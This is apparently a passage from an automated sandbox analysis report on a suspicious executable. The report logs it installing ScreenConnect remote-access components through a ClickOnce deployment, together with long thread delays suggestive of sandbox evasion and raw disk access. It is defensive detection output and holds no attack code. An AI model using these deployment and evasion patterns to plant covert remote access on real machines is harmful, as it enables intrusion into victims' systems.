                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1B280000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 1070000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 2AA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 28E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 1910000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 1AA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 3AA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 730000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1A370000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599763Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599523Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599371Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599263Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597947Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597666Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597435Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596013Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595793Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595682Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595575Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594966Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593545Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593314Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593077Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592795Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592684Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592550Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592433Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6692Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2896Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe TID: 7644Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599763s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599523s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599371s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599263s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599094s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597947s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597666s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597547s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597435s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597327s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596013s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595793s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595682s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595575s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595328s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595187s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595078s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594966s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594859s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594750s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594640s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594422s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594094s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593545s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593314s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593187s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593077s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592954s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592795s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592684s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592550s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592433s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592280s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592172s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 6464Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 2896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 2916Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 4420Thread sleep count: 298 > 30
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 5292Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00914A4B FindFirstFileExA,0_2_00914A4B
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594966Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593545Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593314Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593077Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592795Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592684Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592550Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592433Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\Jump to behavior
